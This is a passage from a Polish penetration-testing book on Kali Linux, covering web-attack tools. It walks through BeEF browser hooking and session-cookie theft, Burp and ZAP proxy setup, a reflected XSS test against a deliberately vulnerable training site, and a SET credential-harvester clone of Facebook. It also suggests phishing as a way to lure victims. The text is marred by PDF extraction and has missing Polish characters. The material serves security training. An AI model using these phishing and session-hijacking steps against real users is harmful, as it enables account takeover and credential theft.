Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

233

apt-get updateapt-get install beef-xss

Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF

Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku

Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew

Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

234

W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef

Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

235

Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji

BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

236

Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania

FoxyProxy mdash wtyczka przegl darki Firefox

Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox

Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony

Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)

Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-

myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)

Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

253

Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

254

Fimap

Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)

Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia

fimap --install -plugins

Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)

Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

255

